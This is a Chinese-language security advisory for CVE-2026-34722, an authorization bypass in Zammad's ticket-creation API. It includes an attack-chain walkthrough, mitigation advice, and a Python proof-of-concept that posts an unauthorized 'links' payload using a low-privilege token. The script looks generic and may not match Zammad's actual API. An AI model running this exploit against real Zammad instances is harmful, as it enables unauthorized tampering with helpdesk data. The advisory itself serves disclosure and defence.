IPBUF安全漏洞报告
English
CVE-2026-34722 CVSS 4.3 中危

CVE-2026-34722 Zammad工单创建端口授权缺失漏洞

披露日期: 2026-04-08
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34722
漏洞类型
权限绕过
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Zammad

相关标签

权限绕过ZammadWeb安全CVE-2026-34722API安全

漏洞概述

Zammad是一款开源Web帮助台系统。在7.0.1和6.5.4之前的版本中,其工单创建端点在使用添加链接参数时缺少授权验证。这允许低权限用户通过该端点绕过正常权限限制,向系统工单添加未授权的链接,从而破坏系统数据的完整性。

技术细节

该漏洞源于Zammad后端在处理特定API请求时的逻辑缺陷。具体来说,当攻击者向工单创建接口发送POST请求时,如果请求体中包含了用于关联或添加链接的参数(如'links'),服务器端代码未对当前用户的权限进行充分校验。在正常的业务逻辑中,修改工单属性或添加外部链接通常需要更高的权限,但受影响版本的代码直接处理了该参数。攻击者利用此漏洞,仅需低权限账号即可构造恶意HTTP请求,成功执行本应被禁止的操作,导致数据完整性受损。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标系统为Zammad,并确认其版本低于7.0.1或6.5.4。
STEP 2
2. 获取低权限账号
注册或通过其他方式获取一个普通的低权限用户账号及API Token。
STEP 3
3. 构造恶意请求
编写脚本,向工单创建API接口发送POST请求,并在请求体中插入包含恶意链接的'links'参数。
STEP 4
4. 执行攻击
发送构造的请求,服务器因缺少授权检查而接受请求并创建包含未授权链接的工单。
STEP 5
5. 验证结果
检查工单详情,确认链接是否被成功添加,从而验证漏洞利用成功。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Zammad installation) target_url = "http://target-zammad-instance.com/api/v1/tickets" # Headers with low-privilege authentication token headers = { "Authorization": "Token low_priv_user_token_here", "Content-Type": "application/json" } # Payload exploiting the missing authorization on 'links' parameter payload = { "title": "Exploit Test Ticket", "group": "Users", "customer": "[email protected]", "article": { "subject": "Test Article", "body": "Testing the vulnerability." }, # Vulnerable parameter: Adding a link without proper authorization check "links": { "target": "http://malicious-site.com", "type": "child" } } try: response = requests.post(target_url, json=payload, headers=headers) if response.status_code == 201: print("[+] Exploit successful! Ticket created with unauthorized link.") print("Response:", response.json()) else: print("[-] Request failed or patched.") print("Status Code:", response.status_code) print("Response:", response.text) except Exception as e: print(f"Error: {e}")

影响范围

Zammad < 7.0.1
Zammad < 6.5.4

防御指南

临时缓解措施
如果无法立即升级,建议管理员通过网络访问控制列表(ACL)限制对/api/v1/tickets端点的访问,仅允许受信任的内部IP调用。同时,应启用详细的日志审计,监控是否存在低权限用户尝试添加工单链接的异常行为。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表